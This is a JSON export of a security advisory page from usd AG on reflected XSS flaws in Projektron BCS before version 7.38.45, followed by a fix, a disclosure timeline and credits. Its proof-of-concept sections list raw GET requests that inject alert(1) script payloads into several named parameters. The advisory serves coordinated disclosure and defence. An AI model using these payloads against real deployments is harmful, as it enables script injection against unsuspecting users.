{"id":16559,"date":"2021-07-07T13:05:06","date_gmt":"2021-07-07T11:05:06","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2018-0018\/"},"modified":"2021-07-19T14:08:24","modified_gmt":"2021-07-19T12:08:24","slug":"usd-2018-0018","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2018-0018\/","title":{"rendered":"usd-2018-0018"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<h1 class=\"h-custom-headline usd-small-letters h2\"><span>usd-2018-0018 | Projektron BCS\/ All versions before 7.38.45<\/span><\/h1>\n<p><span><\/span><br \/><strong>Advisory ID<\/strong><span>: usd-2018-0018<\/span><br \/><strong>CVE Number<\/strong><span>: N\/A<\/span><br \/><strong>Affected Product<\/strong><span>: Projektron BCS<\/span><br \/><strong>Affected Version<\/strong><span>: All versions before 7.38.45<\/span><br \/><strong>Vulnerability Type<\/strong><span>: Reflected XSS<\/span><br \/><strong>Security Risk<\/strong><span>: High<\/span><br \/><strong>Vendor URL<\/strong><span>: <\/span><a href=\"https:\/\/www.projektron.de\/bcs\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.projektron.de\/bcs\/<\/a><br \/><strong>Vendor Status<\/strong><span>: Fixed<\/span><\/p>\n<p>&nbsp;<\/p>\n<h3>Description<\/h3>\n<p><span>Reflected XSS attack (or non-persistent attack) occur when a malicious script is reflected off of a web application to the victim\u2019s browser. The attack is typically delivered via email or a web site and activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts.<\/span><\/p>\n<p><span><\/span><\/p>\n<h3>Proof of Concept (PoC)<\/h3>\n<div class=\"x-text\">\n<p>The \u201aeditor\u2018, \u201aoidnamefield\u2018 and \u201aoidfield\u2018 parameters of \/bcs\/eventdeputydetail are vulnerable to XSS<\/p>\n<\/div>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]GET \/bcs\/multioidselection\/*\/display?_pcc_typ_=JUserGroup%2520JOU%2520JUser&amp;amp;_pcc_mode_=Target&amp;amp;editor=TokenInput39390'%3balert(1)%2f%2f152&amp;amp;oidfield=eventdetail%2Csupporter%2Csupporter&amp;amp;oidnamefield=eventdetail%2Csupporter%2Csupporter_entitynames&amp;amp;transactionId=1503060134184-40619437911778866 HTTP\/1.1<\/p>\n<p>GET \/bcs\/multioidselection\/*\/display?_pcc_typ_=JUserGroup%2520JOU%2520JUser&amp;amp;_pcc_mode_=Target&amp;amp;editor=TokenInput&amp;amp;oidfield=eventdetail%2csupporter%2csupporter51042'%3balert(1)%2f%2f430&amp;amp;oidnamefield=eventdetail%2Csupporter%2Csupporter_entitynames&amp;amp;transactionId=1503060134184-40619437911778866 HTTP\/1.1<\/p>\n<p>GET \/bcs\/multioidselection\/*\/display?_pcc_typ_=JUserGroup%2520JOU%2520JUser&amp;amp;_pcc_mode_=Target&amp;amp;editor=TokenInput&amp;amp;oidfield=eventdetail%2Csupporter%2Csupporter&amp;amp;oidnamefield=eventdetail%2csupporter%2csupporter_entitynames14437'%3balert(1)%2f%2f761&amp;amp;transactionId=1503060134184-40619437911778866 HTTP\/1.1<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<h3><span>Second Proof of Concept<\/span><\/h3>\n<p>The \u201adescription\u2018, \u201aInitialApplyButtonsOnError\u2018 and \u201aHighlightedApplyButtonsOnError\u2018 parameters of \/bcs\/eventdeputydetail are vulnerable to XSS<\/p>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]GET \/bcs\/eventdeputydetail\/main\/edit?eventdetail%2C__componentTitleComposed=true&amp;amp;eventdetail%2Cformsubmitted=true&amp;amp;eventdetail%2CData_FirstOnPage=eventdetail&amp;amp;eventdetail%2Cdialog_group_visible_attributes=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_name=true&amp;amp;eventdetail%2C%21attributetoggle_name=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentUser=true&amp;amp;eventdetail%2C%21attributetoggle_appointmentUser=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentStart=true&amp;amp;eventdetail%2C%21attributetoggle_appointmentStart=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentEnd=true&amp;amp;eventdetail%2C%21attributetoggle_appointmentEnd=true&amp;amp;eventdetail%2C%21attributetoggle_eventDuration=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_deputiesAndToInform=true&amp;amp;eventdetail%2C%21attributetoggle_deputiesAndToInform=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_subtyp=true&amp;amp;eventdetail%2C%21attributetoggle_subtyp=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_state=true&amp;amp;eventdetail%2C%21attributetoggle_state=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_workloadHandling=true&amp;amp;eventdetail%2C%21attributetoggle_workloadHandling=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_description=true&amp;amp;eventdetail%2C%21attributetoggle_description=true&amp;amp;eventdetail%2Csettings_dialog_opened=false&amp;amp;eventdetail%2Cfilters_has_unapplied_changes=false&amp;amp;eventdetail%2CData_FirstOnPage=eventdetail&amp;amp;eventdetail%2Cname%2Cname=Stellvertretung&amp;amp;eventdetail%2CappointmentStart%2CappointmentStart_date%2CappointmentStart_date=17.08.2017&amp;amp;eventdetail%2CappointmentStart%2CappointmentStart=y&amp;amp;eventdetail%2CappointmentEnd%2CappointmentEnd_date%2CappointmentEnd_date=17.08.2017&amp;amp;eventdetail%2CappointmentEnd%2CappointmentEnd=y&amp;amp;eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform=%7B%22JAppointmentRef%22%3A%5B%7B%22relatedOid%22%3A%221051012826131_JUser%22%2C%22token_id%22%3A%221051012826131_JUser%22%2C%22is_new%22%3A%22true%22%2C%22eventReferenceTyp%22%3A%22Guest%22%7D%5D%7D&amp;amp;eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_search=&amp;amp;eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_editortype=TokenInput&amp;amp;eventdetail%2Cdescription%2Cdescription=rv1x4%3cscript%3ealert(1)%3c%2fscript%3eq6ayqxxghok&amp;amp;eventdetail%2Coid=NEW_CREATED_OBJECT_JAppointment&amp;amp;eventdetail%2CData_SuppressLastHorizontalLine=false&amp;amp;eventdetail%2Cedit_form_data_submitted=true&amp;amp;new_entity_init_attributes%2Ctyp=JAppointment&amp;amp;new_entity_init_attributes%2CappointmentEnd=2017-08-17T00%3A00%3A00%2B02%3A00&amp;amp;oid=1502784743839_JAppointment&amp;amp;action%2CSaveAction%2Ceventdetail=0&amp;amp;new_entity_init_attributes%2CappointmentStart=2017-08-17T00%3A00%3A00%2B02%3A00&amp;amp;pageentity_is_new=true&amp;amp;user=Entwickler2&amp;amp;new_entity_init_attributes%2Csubtyp=deputy&amp;amp;pagetimestamp=1502976689686&amp;amp;transactionId=1502976689702-6759310571525836&amp;amp;new_entity_init_attributes%2CappointmentUser=1051012826131_JUser&amp;amp;new_entity_init_attributes%2Coid=1502784743839_JAppointment&amp;amp;ConfirmDiscardChangesDialog%2CInitialApplyButtonsOnError=eventdetail%2CApply&amp;amp;PageForm%2CformChangedIndicator=true&amp;amp;PageForm%2CHighlightedApplyButtonsOnError=eventdetail%2CApply&amp;amp;eventdetail%2CApply=eventdetail%2CApply&amp;amp;submitButtonPressed=eventdetail%2CApply HTTP\/1.1<\/p>\n<p>GET \/bcs\/eventdeputydetail\/main\/edit?eventdetail%2C__componentTitleComposed=true&amp;amp;eventdetail%2Cformsubmitted=true&amp;amp;eventdetail%2CData_FirstOnPage=eventdetail&amp;amp;eventdetail%2Cdialog_group_visible_attributes=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_name=true&amp;amp;eventdetail%2C%21attributetoggle_name=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentUser=true&amp;amp;eventdetail%2C%21attributetoggle_appointmentUser=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentStart=true&amp;amp;eventdetail%2C%21attributetoggle_appointmentStart=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentEnd=true&amp;amp;eventdetail%2C%21attributetoggle_appointmentEnd=true&amp;amp;eventdetail%2C%21attributetoggle_eventDuration=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_deputiesAndToInform=true&amp;amp;eventdetail%2C%21attributetoggle_deputiesAndToInform=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_subtyp=true&amp;amp;eventdetail%2C%21attributetoggle_subtyp=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_state=true&amp;amp;eventdetail%2C%21attributetoggle_state=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_workloadHandling=true&amp;amp;eventdetail%2C%21attributetoggle_workloadHandling=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_description=true&amp;amp;eventdetail%2C%21attributetoggle_description=true&amp;amp;eventdetail%2Csettings_dialog_opened=false&amp;amp;eventdetail%2Cfilters_has_unapplied_changes=false&amp;amp;eventdetail%2CData_FirstOnPage=eventdetail&amp;amp;eventdetail%2Cname%2Cname=Stellvertretung&amp;amp;eventdetail%2CappointmentStart%2CappointmentStart_date%2CappointmentStart_date=17.08.2017&amp;amp;eventdetail%2CappointmentStart%2CappointmentStart=y&amp;amp;eventdetail%2CappointmentEnd%2CappointmentEnd_date%2CappointmentEnd_date=17.08.2017&amp;amp;eventdetail%2CappointmentEnd%2CappointmentEnd=y&amp;amp;eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform=%7B%22JAppointmentRef%22%3A%5B%7B%22relatedOid%22%3A%221051012826131_JUser%22%2C%22token_id%22%3A%221051012826131_JUser%22%2C%22is_new%22%3A%22true%22%2C%22eventReferenceTyp%22%3A%22Guest%22%7D%5D%7D&amp;amp;eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_search=&amp;amp;eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_editortype=TokenInput&amp;amp;eventdetail%2Cdescription%2Cdescription=&amp;amp;eventdetail%2Coid=NEW_CREATED_OBJECT_JAppointment&amp;amp;eventdetail%2CData_SuppressLastHorizontalLine=false&amp;amp;eventdetail%2Cedit_form_data_submitted=true&amp;amp;new_entity_init_attributes%2Ctyp=JAppointment&amp;amp;new_entity_init_attributes%2CappointmentEnd=2017-08-17T00%3A00%3A00%2B02%3A00&amp;amp;oid=1502784743839_JAppointment&amp;amp;action%2CSaveAction%2Ceventdetail=0&amp;amp;new_entity_init_attributes%2CappointmentStart=2017-08-17T00%3A00%3A00%2B02%3A00&amp;amp;pageentity_is_new=true&amp;amp;user=Entwickler2&amp;amp;new_entity_init_attributes%2Csubtyp=deputy&amp;amp;pagetimestamp=1502976689686&amp;amp;transactionId=1502976689702-6759310571525836&amp;amp;new_entity_init_attributes%2CappointmentUser=1051012826131_JUser&amp;amp;new_entity_init_attributes%2Coid=1502784743839_JAppointment&amp;amp;ConfirmDiscardChangesDialog%2CInitialApplyButtonsOnError=eventdetail%2cApply76429'%3balert(1)%2f%2f411vxq6nz&amp;amp;PageForm%2CformChangedIndicator=true&amp;amp;PageForm%2CHighlightedApplyButtonsOnError=eventdetail%2CApply&amp;amp;eventdetail%2CApply=eventdetail%2CApply&amp;amp;submitButtonPressed=eventdetail%2CApply HTTP\/1.1<\/p>\n<p>GET \/bcs\/eventdeputydetail\/main\/edit?eventdetail%2C__componentTitleComposed=true&amp;amp;eventdetail%2Cformsubmitted=true&amp;amp;eventdetail%2CData_FirstOnPage=eventdetail&amp;amp;eventdetail%2Cdialog_group_visible_attributes=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_name=true&amp;amp;eventdetail%2C%21attributetoggle_name=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentUser=true&amp;amp;eventdetail%2C%21attributetoggle_appointmentUser=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentStart=true&amp;amp;eventdetail%2C%21attributetoggle_appointmentStart=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentEnd=true&amp;amp;eventdetail%2C%21attributetoggle_appointmentEnd=true&amp;amp;eventdetail%2C%21attributetoggle_eventDuration=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_deputiesAndToInform=true&amp;amp;eventdetail%2C%21attributetoggle_deputiesAndToInform=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_subtyp=true&amp;amp;eventdetail%2C%21attributetoggle_subtyp=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_state=true&amp;amp;eventdetail%2C%21attributetoggle_state=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_workloadHandling=true&amp;amp;eventdetail%2C%21attributetoggle_workloadHandling=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_description=true&amp;amp;eventdetail%2C%21attributetoggle_description=true&amp;amp;eventdetail%2Csettings_dialog_opened=false&amp;amp;eventdetail%2Cfilters_has_unapplied_changes=false&amp;amp;eventdetail%2CData_FirstOnPage=eventdetail&amp;amp;eventdetail%2Cname%2Cname=Stellvertretung&amp;amp;eventdetail%2CappointmentStart%2CappointmentStart_date%2CappointmentStart_date=17.08.2017&amp;amp;eventdetail%2CappointmentStart%2CappointmentStart=y&amp;amp;eventdetail%2CappointmentEnd%2CappointmentEnd_date%2CappointmentEnd_date=17.08.2017&amp;amp;eventdetail%2CappointmentEnd%2CappointmentEnd=y&amp;amp;eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform=%7B%22JAppointmentRef%22%3A%5B%7B%22relatedOid%22%3A%221051012826131_JUser%22%2C%22token_id%22%3A%221051012826131_JUser%22%2C%22is_new%22%3A%22true%22%2C%22eventReferenceTyp%22%3A%22Guest%22%7D%5D%7D&amp;amp;eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_search=&amp;amp;eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_editortype=TokenInput&amp;amp;eventdetail%2Cdescription%2Cdescription=&amp;amp;eventdetail%2Coid=NEW_CREATED_OBJECT_JAppointment&amp;amp;eventdetail%2CData_SuppressLastHorizontalLine=false&amp;amp;eventdetail%2Cedit_form_data_submitted=true&amp;amp;new_entity_init_attributes%2Ctyp=JAppointment&amp;amp;new_entity_init_attributes%2CappointmentEnd=2017-08-17T00%3A00%3A00%2B02%3A00&amp;amp;oid=1502784743839_JAppointment&amp;amp;action%2CSaveAction%2Ceventdetail=0&amp;amp;new_entity_init_attributes%2CappointmentStart=2017-08-17T00%3A00%3A00%2B02%3A00&amp;amp;pageentity_is_new=true&amp;amp;user=Entwickler2&amp;amp;new_entity_init_attributes%2Csubtyp=deputy&amp;amp;pagetimestamp=1502976689686&amp;amp;transactionId=1502976689702-6759310571525836&amp;amp;new_entity_init_attributes%2CappointmentUser=1051012826131_JUser&amp;amp;new_entity_init_attributes%2Coid=1502784743839_JAppointment&amp;amp;ConfirmDiscardChangesDialog%2CInitialApplyButtonsOnError=eventdetail%2CApply&amp;amp;PageForm%2CformChangedIndicator=true&amp;amp;PageForm%2CHighlightedApplyButtonsOnError=eventdetail%2cApply11494'%3balert(1)%2f%2f133etp0ac&amp;amp;eventdetail%2CApply=eventdetail%2CApply&amp;amp;submitButtonPressed=eventdetail%2CApply HTTP\/1.1<\/p>\n<p>GET \/bcs\/eventdeputydetail\/main\/edit?eventdetail%2C__componentTitleComposed=true&amp;amp;eventdetail%2Cformsubmitted=true&amp;amp;eventdetail%2CData_FirstOnPage=eventdetail&amp;amp;eventdetail%2Cdialog_group_visible_attributes=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_name=true&amp;amp;eventdetail%2C%21attributetoggle_name=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentUser=true&amp;amp;eventdetail%2C%21attributetoggle_appointmentUser=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentStart=true&amp;amp;eventdetail%2C%21attributetoggle_appointmentStart=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_appointmentEnd=true&amp;amp;eventdetail%2C%21attributetoggle_appointmentEnd=true&amp;amp;eventdetail%2C%21attributetoggle_eventDuration=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_deputiesAndToInform=true&amp;amp;eventdetail%2C%21attributetoggle_deputiesAndToInform=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_subtyp=true&amp;amp;eventdetail%2C%21attributetoggle_subtyp=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_state=true&amp;amp;eventdetail%2C%21attributetoggle_state=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_workloadHandling=true&amp;amp;eventdetail%2C%21attributetoggle_workloadHandling=true&amp;amp;eventdetail%2CSettings%2CSettingsDefinitions%2Cattributetoggle_description=true&amp;amp;eventdetail%2C%21attributetoggle_description=true&amp;amp;eventdetail%2Csettings_dialog_opened=false&amp;amp;eventdetail%2Cfilters_has_unapplied_changes=false&amp;amp;eventdetail%2CData_FirstOnPage=eventdetail&amp;amp;eventdetail%2Cname%2Cname=Stellvertretung&amp;amp;eventdetail%2CappointmentStart%2CappointmentStart_date%2CappointmentStart_date=17.08.2017&amp;amp;eventdetail%2CappointmentStart%2CappointmentStart=y&amp;amp;eventdetail%2CappointmentEnd%2CappointmentEnd_date%2CappointmentEnd_date=17.08.2017&amp;amp;eventdetail%2CappointmentEnd%2CappointmentEnd=y&amp;amp;eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform=%7B%22JAppointmentRef%22%3A%5B%7B%22relatedOid%22%3A%221051012826131_JUser%22%2C%22token_id%22%3A%221051012826131_JUser%22%2C%22is_new%22%3A%22true%22%2C%22eventReferenceTyp%22%3A%22Guest%22%7D%5D%7D&amp;amp;eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_search=&amp;amp;eventdetail%2CdeputiesAndToInform%2CdeputiesAndToInform_editortype=TokenInput&amp;amp;eventdetail%2Cdescription%2Cdescription=rv1x4%3cscript%3ealert(1)%3c%2fscript%3eq6ayqxxghok&amp;amp;eventdetail%2Coid=NEW_CREATED_OBJECT_JAppointment&amp;amp;eventdetail%2CData_SuppressLastHorizontalLine=false&amp;amp;eventdetail%2Cedit_form_data_submitted=true&amp;amp;new_entity_init_attributes%2Ctyp=JAppointment&amp;amp;new_entity_init_attributes%2CappointmentEnd=2017-08-17T00%3A00%3A00%2B02%3A00&amp;amp;oid=1502784743839_JAppointment&amp;amp;action%2CSaveAction%2Ceventdetail=0&amp;amp;new_entity_init_attributes%2CappointmentStart=2017-08-17T00%3A00%3A00%2B02%3A00&amp;amp;pageentity_is_new=true&amp;amp;user=Entwickler2&amp;amp;new_entity_init_attributes%2Csubtyp=deputy&amp;amp;pagetimestamp=1502976689686&amp;amp;transactionId=1502976689702-6759310571525836&amp;amp;new_entity_init_attributes%2CappointmentUser=1051012826131_JUser&amp;amp;new_entity_init_attributes%2Coid=1502784743839_JAppointment&amp;amp;ConfirmDiscardChangesDialog%2CInitialApplyButtonsOnError=eventdetail%2CApply&amp;amp;PageForm%2CformChangedIndicator=true&amp;amp;PageForm%2CHighlightedApplyButtonsOnError=eventdetail%2CApply&amp;amp;eventdetail%2CApply=eventdetail%2CApply&amp;amp;submitButtonPressed=eventdetail%2CApply HTTP\/1.1<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<div class=\"e16902-22 x-container max width\">\n<div class=\"e16902-23 x-column x-sm x-1-1\">\n<h3>Fix<\/h3>\n<p><span>Make sure to encode the user supplied input.<\/span><\/p>\n<h3><\/h3>\n<h3>Timeline<\/h3>\n<ul>\n<li>2017-09-15 \u2013 First contact request<\/li>\n<li>2017-09-19 Vendor accepts all reported issues<\/li>\n<li>2018-04-06 Vendor provides a new release 7.38.45<\/li>\n<li>2018-06-06 Security advisory released<\/li>\n<\/ul>\n<h3><\/h3>\n<h3>Credits<\/h3>\n<p><span>These security vulnerabilities were found by Stefan Schmer of usd AG.<\/span><\/p>\n<\/div>\n<\/div>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2018-0018 | Projektron BCS\/ All versions before 7.38.45 Advisory ID: usd-2018-0018CVE Number: N\/AAffected Product: Projektron BCSAffected Version: All versions before 7.38.45Vulnerability Type: Reflected XSSSecurity Risk: HighVendor URL: https:\/\/www.projektron.de\/bcs\/Vendor Status: Fixed &nbsp; Description Reflected XSS attack (or non-persistent attack) occur when a malicious script is reflected off of a web application to the victim\u2019s browser. The [&hellip;]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16559","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16559","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16559"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16559\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16559"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}